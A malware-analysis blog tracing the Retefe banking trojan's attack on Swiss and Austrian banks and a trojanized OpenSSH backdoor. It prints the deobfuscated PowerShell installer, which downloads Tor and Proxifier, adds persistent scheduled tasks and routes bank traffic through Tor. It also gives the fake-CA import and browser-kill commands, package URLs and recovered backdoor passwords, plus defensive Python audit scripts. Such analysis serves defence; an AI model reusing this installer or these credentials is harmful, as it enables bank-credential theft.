Wednesday, November 16, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (III)

Following the last two posts, this is a quick update: I have detected that some new Swiss banks have been added to the list of victims of Retefe since I last checked, some weeks ago.

These are:

*valiant.ch
*wir.ch
*bankthalwil.ch
*piguetgalland.ch
*triba.ch
*inlinea.ch
*bernerlandbank.ch
*bancasempione.ch
*bsibank.com
*corneronline.ch
*vermoegenszentrum.ch
*gobanking.ch
*slbucheggberg.ch
*slfrutigen.ch
*hypobank.ch
*regiobank.ch
*rbm.ch
*hbl.ch
*ersparniskasse.ch
*ekr.ch
sparkasse-dielsdorf.ch
*eki.ch
*bankgantrisch.ch
*bbobank.ch
*alpharheintalbank.ch
*aekbank.ch
*acrevis.ch




Also, the cyber criminals have changed the way the malicious payload is weaponized inside the malicious 'docx': instead of a JS script, they are now using an executable (EXE):





Monday, October 17, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (II)

A few days ago, when I took a look at the latest Retefe campaign affecting Swiss financial institutions, I did not have the time to take a deeper look at the malicious JS embedded in the .docx file, so in this post I'll explain a bit about it. In particular, I'm interested in understanding how the Proxifier tool is set up with a custom profile to forward the traffic through Tor. This tool is something the cyber criminals have introduced recently; previously they used a proxy PAC file, configured through the registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL".

The latest Retefe analysis from Avast shows exactly the behaviour described above.

Retefe is not only affecting Swiss banks but also banks in other countries, like the UK. So the custom proxy profile might either be hardcoded into the malicious JS or downloaded dynamically. Let's take a look at it.

(I have uploaded the malicious JS payload to VT.)

The JS is obfuscated so I'm using Visual Studio to perform some debugging.

The first interesting thing I see are the Tor URLs defined: bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion and a7j7f3rqdvoe5bav.onion.




Also, there is the fake Comodo CA, which is used to avoid the browser SSL warnings. It is base64 encoded.




There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.










Then there is a command to import the certificate:
"certutil -addstore -f -user \"ROOT\" \""

and some base64-encoded commands to kill the running browsers:




"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe

"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe

So at this point the malicious certificate has been imported and all the browsers, after being killed, have the malicious COMODO CA certificate in their CA chain.

Debugging deeper, in the end a temporary file is created which contains a PowerShell script with the interesting stuff.




This is the code



function Unzip
{
    param([string]$zipfile, [string]$destination);
    # Fetch a standalone 7-Zip binary into %TEMP%; a failed download is silently ignored
    $7zaExe = Join-Path $env:Temp '7za.exe';
    if (-NOT (Test-Path $7zaExe)){
        Try
        {
            (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe);
        }
        Catch{}
    }
    # Extract with 7za.exe if available, otherwise through the Shell.Application COM object
    if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){
        Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
    }
    else{
        $shell = new-object -com shell.application;
        $zip = $shell.NameSpace($zipfile);
        foreach($item in $zip.items())
        {
            $shell.Namespace($destination).copyhere($item);
        }
    }
}
function Base64ToFile
{
    param([string]$file, [string]$string);
    # Decode a base64 string and write the raw bytes to $file (used for Proxifier's Settings.ini and Default.ppx)
    $bytes=[System.Convert]::FromBase64String($string);
    #set-content -encoding byte $file -value $bytes;
    [IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask
{
    param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0);
    # Persistence: register a scheduled task (through the TaskScheduler managed wrapper loaded in InstallTP)
    # that runs $cmd at logon and, when $restart is 1, again every 20 minutes
    $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
    $td=$ts.NewTask();
    $td.RegistrationInfo.Description = 'Does something';
    $td.Settings.DisallowStartIfOnBatteries = $False;
    $td.Settings.StopIfGoingOnBatteries = $False;
    $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
    $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
    $LogonTrigger.StartBoundary=[System.DateTime]::Now;
    $LogonTrigger.UserId=$env:username;
    $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
    $td.Triggers.Add($LogonTrigger);
    if($restart -eq 1){
        $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
        $TimeTrigger.StartBoundary=[System.DateTime]::Now;
        $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20);
        $TimeTrigger.Repetition.StopAtDurationEnd=$False;
        $td.Triggers.Add($TimeTrigger);
    }
    $ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params);
    $td.Actions.Add($ExecAction);
    $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
    $task.Run();
}
function InstallTP{
    # Stage 1: fetch the TaskScheduler managed library from CodePlex and load it into this process
    $File=$env:Temp+'\ts.zip';
    $Dest=$env:Temp+'\ts';
    (New-Object System.Net.WebClient).DownloadFile('http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031',$File);
    if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null;
    Unzip $File $Dest;
    rm -Force $File;
    $TSAssembly=$Dest+'\v2.0\Microsoft.Win32.TaskScheduler.dll';
    $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
    # Stage 2: fetch the Tor bundle into %APPDATA%\TP and start tor.exe hidden (window style 0) via mshta, as the 'SkypeUpdateTask' logon task
    $TFile=$env:Temp+'\t.zip';
    $DestTP=$env:APPDATA+'\TP';
    (New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip',$TFile);
    if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null;
    Unzip $TFile $DestTP;
    rm -Force $TFile;
    $tor=$DestTP+'\Tor\tor.exe';
    $tor=$tor.Replace('\','/');
    $tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
    AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd;
    # Stage 3: fetch Proxifier Portable, rename its folder to 'p', and drop the embedded Settings.ini and Default.ppx profile
    $PFile=$env:Temp+'\p1.zip';
    $wc=new-object net.webclient;
    $purl='http://proxifier.com/distr/ProxifierPE.zip';
    $wc.DownloadFile($purl,$PFile);
    Unzip $PFile $DestTP;
    $p_old=$DestTP+'\Proxifier PE\';
    rm -Force $PFile;
    Rename-Item -path $p_old -newName 'p';
    $p_fold=$DestTP+'\p\';
    $p=$DestTP+'\p\Proxifier.exe';
    $settings_file=$p_fold+'Settings.ini';
    Base64ToFile $settings_file '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';
    $p_prof=$p_fold+'Profiles\';
    md $p_prof | Out-Null;
    $def_file=$p_prof+'Default.ppx';
    Base64ToFile $def_file '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';
    # Stage 4: run Proxifier as the 'ChromeUpdate' task, at logon and every 20 minutes
    AddTask 'ChromeUpdate' $p '' 1;
}
InstallTP


At the beginning there is a function 'Unzip', in charge of downloading an application from the URL https://chocolatey.org/7za.exe to unzip compressed files.

Then the function 'Base64ToFile' base64-decodes a string and stores the output in a file.

But the key function is the last one, InstallTP, which does several things:


  1. Pulls a file from http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031, which allows the malicious process to be run automatically as a scheduled task
  2. Pulls the Tor client from https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip to forward the traffic through Tor
  3. Pulls the Proxifier application from http://proxifier.com/distr/ProxifierPE.zip
  4. Configures the Settings.ini for Proxifier
  5. And finally, the interesting stuff: the Proxifier profile, where I can see all the banks whose traffic is sent through Tor

echo "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"  | base64 --decode
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <Options>
    <Resolve>
      <AutoModeDetection enabled="false" />
      <ViaProxy enabled="true">
        <TryLocalDnsFirst enabled="false" />
      </ViaProxy>
      <ExclusionList>%ComputerName%; localhost; *.local</ExclusionList>
    </Resolve>
    <ProxificationPortableEngine subsystem="32">
      <Location>BaseProvider</Location>
      <Type hotpatch="true">Prologue</Type>
    </ProxificationPortableEngine>
    <ProxificationPortableEngine subsystem="64">
      <Location>BaseProvider</Location>
      <Type hotpatch="false">Prologue</Type>
    </ProxificationPortableEngine>
    <Encryption mode="basic" />
    <HttpProxiesSupport enabled="false" />
    <HandleDirectConnections enabled="false" />
    <ConnectionLoopDetection enabled="true" />
    <ProcessServices enabled="false" />
    <ProcessOtherUsers enabled="false" />
  </Options>
  <ProxyList>
    <Proxy id="100" type="SOCKS5">
      <Address>127.0.0.1</Address>
      <Port>9050</Port>
      <Options>48</Options>
    </Proxy>
  </ProxyList>
  <ChainList />
  <RuleList>
    <Rule enabled="true">
      <Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" />
    </Rule>
    <Rule enabled="true">
      <Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;eb.akb.ch;*.ubs.com;tb.raiffeisendirect.ch;*.bkb.ch;*.lukb.ch;*.zkb.ch;*.onba.ch;e-banking.gkb.ch;*.bekb.ch;wwwsec.ebanking.zugerkb.ch;netbanking.bcge.ch;*.raiffeisen.ch;*.credit-suisse.com;*.bankaustria.at;*.bawagpsk.com;*.raiffeisen.at;*.static-ubs.com;*.bawag.com;*.clientis.ch;clientis.ch;*bcvs.ch;*cic.ch;www.banking.co.at;*oberbank.at;www.oberbank-banking.at;*baloise.ch;*.ukb.ch;urkb.ch;*.urkb.ch;*.eek.ch;*szkb.ch;*shkb.ch;*glkb.ch;*nkb.ch;*owkb.ch;*cash.ch;*bcf.ch;*.easybank.at;ebanking.raiffeisen.ch;*.onion;*bcv.ch;*juliusbaer.com;*abs.ch;*bcn.ch;*blkb.ch;*bcj.ch;*zuercherlandbank.ch;*valiant.ch;*wir.ch</Targets>
      <Action type="Proxy">100</Action>
    </Rule>
    <Rule enabled="true">
      <Name>Default</Name>
      <Action type="Direct" />
    </Rule>
  </RuleList>
</ProxifierProfile>

So in essence, and answering my own question, the proxy configuration is not downloaded from anywhere; it is just hardcoded and obfuscated in the code.
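The persistence half of InstallTP is easy to audit from the task definitions Windows keeps on disk. The following is an added example, not code from the post or from the malware: it inspects a Scheduled Task XML document for the combination AddTask produces (a logon trigger, an optional 20-minute repetition, and an action that is either mshta.exe with a javascript: URL or a binary dropped under %APPDATA%). The two task documents embedded below are constructed to mirror what AddTask registers; the XML schema is the one Windows stores under C:\Windows\System32\Tasks.

```python
"""Audit Windows Scheduled Task definitions for the persistence pattern that the
AddTask/InstallTP stage above registers: a logon trigger, an optional 20-minute
repetition, and an action that either launches a binary dropped under the user
profile or abuses mshta.exe to run a javascript: URL.

Added example, not part of the post or the malware. The two task documents are
constructed to mirror what AddTask registers; the XML schema is the one Windows
keeps on disk under C:\\Windows\\System32\\Tasks (UTF-16 files, one per task).
"""
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(r"[\\/](AppData|Temp|Downloads|ProgramData)[\\/]", re.I)
KNOWN_BAD_DESCRIPTIONS = {"Does something"}   # hard-coded in Retefe's AddTask


def iso_minutes(duration):
    """PT20M / PT1H30M style ISO 8601 duration -> minutes, or None if unparseable."""
    m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", duration or "")
    if not m:
        return None
    h, mi, s = (int(x) if x else 0 for x in m.groups())
    return h * 60 + mi + s / 60


def audit_task(xml_text):
    """Return human-readable findings for one task definition (empty list = nothing odd)."""
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))
    findings = []
    desc = root.findtext("t:RegistrationInfo/t:Description", default="", namespaces=NS)
    if desc in KNOWN_BAD_DESCRIPTIONS:
        findings.append(f"placeholder description {desc!r}")
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exe.findtext("t:Arguments", default="", namespaces=NS)
        base = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base in SCRIPT_HOSTS:
            findings.append(f"script host {base} with arguments {args[:60]!r}")
            if re.search(r"javascript:|vbscript:|ActiveXObject", args, re.I):
                findings.append("inline script payload passed to the script host")
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            findings.append("executable located under a user-writable path")
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("runs at user logon")
    for rep in root.findall("t:Triggers/t:TimeTrigger/t:Repetition", NS):
        mins = iso_minutes(rep.findtext("t:Interval", default="", namespaces=NS))
        if mins is not None and mins <= 30:
            findings.append(f"re-launches every {mins:g} minutes")
    return findings


def scan_tasks_folder(folder):
    """Walk the on-disk task store and return {path: findings} for tasks that raise anything."""
    report = {}
    for dirpath, _, files in os.walk(folder):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            enc = "utf-16" if raw.startswith((b"\xff\xfe", b"\xfe\xff")) else "utf-8"
            try:
                hits = audit_task(raw.decode(enc, errors="replace"))
            except ET.ParseError:
                continue
            if hits:
                report[path] = hits
    return report


# Constructed sample: what AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd ends up as on disk
TOR_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Does something</Description></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled><Delay>PT0S</Delay></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>mshta.exe</Command>
    <Arguments>"javascript:close(new ActiveXObject('WScript.Shell').Run('C:/Users/u/AppData/Roaming/TP/Tor/tor.exe',0,false))"</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: AddTask 'ChromeUpdate' $p '' 1 (logon plus 20-minute repetition)
PROXIFIER_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Does something</Description></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger><Repetition><Interval>PT20M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2016-10-17T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger>
  </Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\u\AppData\Roaming\TP\p\Proxifier.exe</Command>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, doc in (("SkypeUpdateTask", TOR_TASK), ("ChromeUpdate", PROXIFIER_TASK)):
        print(label, "->", "; ".join(audit_task(doc)))
```

On a live host, `scan_tasks_folder(r"C:\Windows\System32\Tasks")` walks the real store; the "runs at user logon" line on its own is noise, so weigh the combination of findings per task rather than any single one.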

Wednesday, October 12, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again.

Yesterday, while I was investigating something else, I ended up with some malicious emails impersonating a Swiss bank.

The email, with the subject "Von Ihrem Konto ist 78 Franken abgebucht", contains a 'docx' file named "Credit_Zahlung.docx". Looking deeper, I found quite a few more emails sent around the same time with different attachment names and subjects, but all of them on behalf of the same Swiss financial institution.

The 'docx' file contains an embedded image with a text message inviting the user to double-click it in order to see the invoice.






Looking at the file with oledump.py in REMnux, I see some obfuscated JS script code inside the DOCX file.







I did not deobfuscate the JS script code; however, when I executed it I saw that several applications were installed and executed. One of them is a proxy tool (Proxifier) and the other is a Tor client.





The proxy tool is set up to forward all the traffic to some specific URLs through a localhost connection, which in reality is the Tor connection that has been established. The set of URLs that go through the Tor connection are many Swiss and Austrian banks. This is how the Retefe malware operates to steal the customers' usernames and passwords. Luis Rocha explained it some months ago in his blog.




The list of affected domains is:

*postfinance.ch
cs.directnet.com
eb.akb.ch
*.ubs.com
tb.raiffeisendirect.ch
*.bkb.ch
*.lukb.ch
*.zkb.ch
*.onba.ch
e-banking.gkb.ch
*.bekb.ch
wwwsec.ebanking.zugerkb.ch
netbanking.bcge.ch
*.raiffeisen.ch
*.credit-suisse.com
*.bankaustria.at
*.bawagpsk.com
*.raiffeisen.at
*.static-ubs.com
*.bawag.com
*.clientis.ch
clientis.ch
*bcvs.ch
*cic.ch
www.banking.co.at
*oberbank.at
www.oberbank-banking.at
*baloise.ch
*.ukb.ch
urkb.ch
*.urkb.ch
*.eek.ch
*szkb.ch
*shkb.ch
*glkb.ch
*nkb.ch
*owkb.ch
*cash.ch
*bcf.ch
*.easybank.at
ebanking.raiffeisen.ch
*.onion
*bcv.ch
*juliusbaer.com
*abs.ch
*bcn.ch
*blkb.ch
*bcj.ch
*zuercherlandbank.ch




Proxifier is able to redirect the traffic of Internet Explorer, Firefox and Chrome. In the screenshot below there is a connection by Chrome redirected through the proxy to an Onion URL, http://v7yxqrahkza3ewuv.onion
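Reading the profile by hand is fine once, but the same question ("where does this host's traffic go, for this browser?") comes up for every domain in the list above and for every sample. The following is an added example, not code from the post or from Proxifier: it parses the Default.ppx profile decoded in the post above, evaluates the rule list for a given host and process, and flags any rule that hands named targets to a local SOCKS proxy on a Tor port. The embedded profile is a trimmed copy of that Default.ppx; the matching model (first enabled rule wins, top to bottom, with '*' and '?' wildcards in Targets and an exact process-name match in Applications) is my assumption about Proxifier's behaviour, not something the post verifies.

```python
"""Parse a Proxifier .ppx profile and answer: where does this host's traffic go?

Added example, not from the original post. PROFILE is a trimmed copy of the
Default.ppx decoded above. Rule evaluation is modelled as first enabled match
wins, top to bottom, with '*' and '?' wildcards in Targets (an assumption about
Proxifier's matching, not something the post verifies).
"""
import fnmatch
import xml.etree.ElementTree as ET

TOR_SOCKS_PORTS = {9050, 9150}   # tor.exe default and Tor Browser default

PROFILE = """<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <ProxyList>
    <Proxy id="100" type="SOCKS5"><Address>127.0.0.1</Address><Port>9050</Port></Proxy>
  </ProxyList>
  <RuleList>
    <Rule enabled="true"><Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" /></Rule>
    <Rule enabled="true"><Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;*.ubs.com;*.credit-suisse.com;*.onion;*valiant.ch</Targets>
      <Action type="Proxy">100</Action></Rule>
    <Rule enabled="true"><Name>Default</Name><Action type="Direct" /></Rule>
  </RuleList>
</ProxifierProfile>"""


def split_list(text):
    """Proxifier stores Applications and Targets as ';'-separated lists."""
    return [t.strip().lower() for t in (text or "").split(";") if t.strip()]


def parse_profile(xml_text):
    """Return {'proxies': {id: {...}}, 'rules': [...]} in rule order; disabled rules are skipped."""
    root = ET.fromstring(xml_text)
    proxies = {p.get("id"): {"type": p.get("type"),
                             "address": p.findtext("Address"),
                             "port": int(p.findtext("Port"))}
               for p in root.findall("ProxyList/Proxy")}
    rules = []
    for r in root.findall("RuleList/Rule"):
        if r.get("enabled") != "true":
            continue
        action = r.find("Action")
        rules.append({"name": r.findtext("Name"),
                      "apps": split_list(r.findtext("Applications")),
                      "targets": split_list(r.findtext("Targets")),
                      "action": action.get("type"),
                      "proxy": proxies.get(action.text) if action.get("type") == "Proxy" else None})
    return {"proxies": proxies, "rules": rules}


def route(profile, host, app):
    """(rule name, action, proxy-or-None) for a connection by process `app` to `host`."""
    host, app = host.lower(), app.lower()
    for rule in profile["rules"]:
        if rule["apps"] and app not in rule["apps"]:
            continue
        if rule["targets"] and not any(fnmatch.fnmatchcase(host, p) for p in rule["targets"]):
            continue
        return rule["name"], rule["action"], rule["proxy"]
    return None, "Direct", None      # nothing matched: Proxifier lets it through


def tor_redirect_rules(profile):
    """Rules that send a named set of targets to a local SOCKS proxy on a Tor port."""
    return [(r["name"], sorted(r["targets"]))
            for r in profile["rules"]
            if r["proxy"] and r["proxy"]["type"].startswith("SOCKS")
            and r["proxy"]["address"] in ("127.0.0.1", "localhost")
            and r["proxy"]["port"] in TOR_SOCKS_PORTS and r["targets"]]


if __name__ == "__main__":
    prof = parse_profile(PROFILE)
    for name, targets in tor_redirect_rules(prof):
        print(f"rule {name!r} sends {len(targets)} target patterns to Tor: {', '.join(targets)}")
    for host, app in (("www.postfinance.ch", "chrome.exe"), ("www.postfinance.ch", "outlook.exe")):
        print(host, app, "->", route(prof, host, app)[:2])
```

Run against the full Default.ppx, `tor_redirect_rules` returns the complete bank list in one call, and `route` shows why only browser traffic is affected: the "soft" rule carries an Applications filter, so the same host from any other process falls through to the Default rule.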



Looking at the HTTPS certificate, we can see that the CA is Comodo; however, this is a totally fake certificate which has been imported during the infection to fool the user and avoid the browser warnings.


Actually, for that specific domain the original certificate was signed by the Symantec CA.






In essence, the TTPs of this threat actor have not changed that much. However, the Proxifier tool used to redirect the traffic is something recently introduced.





Monday, September 19, 2016

Anatomy of a Real Linux Intrusion Part II (B): OpenSSH trojanized toolkit - different backdoor passwords

This is a short post to add some additional information to the previous post.

The default backdoor password that I analysed in the trojanized OpenSSH source code (PRtestD) is different depending on the OS and the architecture. Also, I figured out that the file where all the 'sniffed' passwords are kept (by default /etc/X11/.pr) is different as well.

As mentioned in my previous post, there are 7 different trojanized packages for several OS / architectures:
  • armv6 (ARMv6): http://gopremium.mooo.com/.../auto/arm61.tgz
  • armv71 (ARMv7): http://gopremium.mooo.com/.../auto/arm71.tgz
  • Vyos (x86): http://gopremium.mooo.com/.../auto/vyos.tgz
  • Vyos64 (x64): http://gopremium.mooo.com/.../auto/vyos64.tgz
  • edgeos (MIPS): http://gopremium.mooo.com/.../auto/edgeos.tgz
  • edgeos64 (MIPS 64bits): http://gopremium.mooo.com/.../auto/edgeos64.tgz
  • default (compile on demand): http://gopremium.mooo.com/.../auto/default.tgz

All the packages (except the default one) contain compiled OpenSSH binaries, and I assumed the password was the same in all of them, but this is not the case. Let's take a look.

Using 'radare2' I disassembled the 'sym.auth_password' function (where the backdoor password is located) across the different SSHD binaries.


ARMv7





This is the code:


; UNKNOWN XREF from 0x000ff39c (unk)
           0x00011100      684b           ldr r3, [pc, 0x1a0]         ; [0x112a4:4]=0x61260 obj.SECRETPW
           0x00011102      2f22           movs r2, 0x2f               ; '/'
           0x00011104      d6f80080       ldr.w r8, [r6]
           0x00011108      4ff0650e       mov.w lr, 0x65              ; 'e'
           0x0001110c      d4f80ca0       ldr.w sl, [r4, 0xc]
           0x00011110      4ff0310c       mov.w ip, 0x31              ; '1'
           0x00011114      9f70           strb r7, [r3, 2]
           ; UNKNOWN XREF from 0x0000ca44 (unk)
           0x00011116      0846           mov r0, r1
           0x00011118      5f71           strb r7, [r3, 5]
           0x0001111a      0d46           mov r5, r1
           ; UNKNOWN XREF from 0x000aefe8 (unk)
           0x0001111c      cdf81480       str.w r8, [sp + local_14h]
           0x00011120      1946           mov r1, r3
           0x00011122      83f803e0       strb.w lr, [r3, 3]
           0x00011126      4ff05008       mov.w r8, 0x50              ; 'P'
           0x0001112a      89f80270       strb.w r7, [sb, 2]
           0x0001112e      83f80080       strb.w r8, [r3]
           0x00011132      4ff05208       mov.w r8, 0x52              ; 'R'
           0x00011136      89f80820       strb.w r2, [sb, 8]
           0x0001113a      83f80180       strb.w r8, [r3, 1]
           0x0001113e      4ff07308       mov.w r8, 0x73              ; 's'
           0x00011142      89f807c0       strb.w ip, [sb, 7]
           0x00011146      83f80480       strb.w r8, [r3, 4]
           0x0001114a      4ff03008       mov.w r8, 0x30              ; '0'
           0x0001114e      89f80020       strb.w r2, [sb]
           0x00011152      83f80680       strb.w r8, [r3, 6]
           0x00011156      7023           movs r3, 0x70               ; 'p'

Following the assembly code, I can see the password is: PRtest0


ARMv6







; XREFS: CALL 0x0002566c
           0x00012358      f04f2de9       push {r4, r5, r6, r7, r8, sb, sl, fp, lr}
           0x0001235c      1cd04de2       sub sp, sp, 0x1c
           0x00012360      60829fe5       ldr r8, [pc, 0x260]         ; [0x125c8:4]=0x74d78 obj.__stack_chk_guard__GLIBC_2.4 LEA loc._d_135 ; "xM." @ 0x125c8
           0x00012364      60329fe5       ldr r3, [pc, 0x260]         ; [0x125cc:4]=0x79268 obj.SECRETPW
           0x00012368      60629fe5       ldr r6, [pc, 0x260]         ; [0x125d0:4]=0x79318 obj.ILOG
           0x0001236c      00a098e5       ldr sl, [r8]
           0x00012370      0040a0e1       mov r4, r0
           0x00012374      14a08de5       str sl, [sp + local_14h]
           0x00012378      50a0a0e3       mov sl, 0x50                ; 'P'
           0x0001237c      00a0c3e5       strb sl, [r3]
           0x00012380      52a0a0e3       mov sl, 0x52                ; 'R'
           0x00012384      01a0c3e5       strb sl, [r3, 1]
           0x00012388      73a0a0e3       mov sl, 0x73                ; 's'
           0x0001238c      74c0a0e3       mov ip, 0x74                ; 't'
           0x00012390      65e0a0e3       mov lr, 0x65                ; 'e'
           0x00012394      04a0c3e5       strb sl, [r3, 4]
           0x00012398      30a0a0e3       mov sl, 0x30                ; '0'
           0x0001239c      0c9094e5       ldr sb, [r4, 0xc]
           0x000123a0      0100a0e1       mov r0, r1
           0x000123a4      06a0c3e5       strb sl, [r3, 6]
           0x000123a8      02c0c3e5       strb ip, [r3, 2]
           0x000123ac      03e0c3e5       strb lr, [r3, 3]
           0x000123b0      05c0c3e5       strb ip, [r3, 5]
           0x000123b4      0150a0e1       mov r5, r1
           0x000123b8      0310a0e1       mov r1, r3
           0x000123bc      7030a0e3       mov r3, 0x70                ; 'p'
           0x000123c0      0a30c6e5       strb r3, [r6, 0xa]
           0x000123c4      6330a0e3       mov r3, 0x63                ; 'c'
           0x000123c8      0330c6e5       strb r3, [r6, 3]
           0x000123cc      5830a0e3       mov r3, 0x58                ; 'X'
           0x000123d0      0530c6e5       strb r3, [r6, 5]
           0x000123d4      0030a0e3       mov r3, 0
           0x000123d8      0c30c6e5       strb r3, [r6, 0xc]
           0x000123dc      2e30a0e3       mov r3, 0x2e                ; '.'
           0x000123e0      2f20a0e3       mov r2, 0x2f                ; section_end..ARM.attributes
           0x000123e4      3170a0e3       mov r7, 0x31                ; '1'
           0x000123e8      0930c6e5       strb r3, [r6, 9]
           0x000123ec      7230a0e3       mov r3, 0x72                ; 'r'
           0x000123f0      0820c6e5       strb r2, [r6, 8]
           0x000123f4      0770c6e5       strb r7, [r6, 7]
           0x000123f8      0020c6e5       strb r2, [r6]
           0x000123fc      0670c6e5       strb r7, [r6, 6]


The password is the same as in the previous listing: PRtest0


vyos






 ; CALL XREF from 0x080664dc (sym.mm_answer_authpassword)
           0x08051f60      83ec5c         sub esp, 0x5c
           0x08051f63      895c244c       mov dword [esp + local_4ch], ebx
           0x08051f67      8b5c2460       mov ebx, dword [esp + local_60h] ; [0x60:4]=0x8048134 section.INTERP ; '`' ; "4...."
           0x08051f6b      89742450       mov dword [esp + local_50h], esi
           0x08051f6f      8b742464       mov esi, dword [esp + local_64h] ; [0x64:4]=19 ; 'd'
           0x08051f73      897c2454       mov dword [esp + local_54h], edi
           0x08051f77      896c2458       mov dword [esp + local_58h], ebp
           0x08051f7b      8b7b0c         mov edi, dword [ebx + 0xc]  ; [0xc:4]=0
           0x08051f7e      8b6b28         mov ebp, dword [ebx + 0x28] ; [0x28:4]=0x200034 ; '(' ; "4"
           0x08051f81      c7442404d0c1.  mov dword [esp + local_4h], obj.SECRETPW ; [0x80bc1d0:4]=0x1930100 LEA obj.SECRETPW ; obj.SECRETPW
           0x08051f89      893424         mov dword [esp], esi
           0x08051f8c      65a114000000   mov eax, dword gs:[0x14]    ; [0x14:4]=1
           0x08051f92      8944243c       mov dword [esp + local_3ch], eax
           0x08051f96      31c0           xor eax, eax
           0x08051f98      c605d0c10b08.  mov byte [obj.SECRETPW], 0x47 ; [0x80bc1d0:1]=0 LEA obj.SECRETPW ; obj.SECRETPW
           0x08051f9f      c605d1c10b08.  mov byte [0x80bc1d1], 0x5a  ; [0x80bc1d1:1]=1
           0x08051fa6      c605d2c10b08.  mov byte [0x80bc1d2], 0x6d  ; [0x80bc1d2:1]=147
           0x08051fad      c605d3c10b08.  mov byte [0x80bc1d3], 0x37  ; [0x80bc1d3:1]=1
           0x08051fb4      c605d4c10b08.  mov byte [0x80bc1d4], 0x48  ; [0x80bc1d4:1]=116
           0x08051fbb      c605d5c10b08.  mov byte [0x80bc1d5], 0x46  ; [0x80bc1d5:1]=0
           0x08051fc2      c605d6c10b08.  mov byte [0x80bc1d6], 0     ; [0x80bc1d6:1]=0
           0x08051fc9      c605a7c20b08.  mov byte [0x80bc2a7], 0x70  ; [0x80bc2a7:1]=2
           0x08051fd0      c605a0c20b08.  mov byte [0x80bc2a0], 0x63  ; [0x80bc2a0:1]=36
           0x08051fd7      c605a5c20b08.  mov byte [0x80bc2a5], 0x2f  ; [0x80bc2a5:1]=1
           0x08051fde      c605a4c20b08.  mov byte [0x80bc2a4], 0x73  ; [0x80bc2a4:1]=0
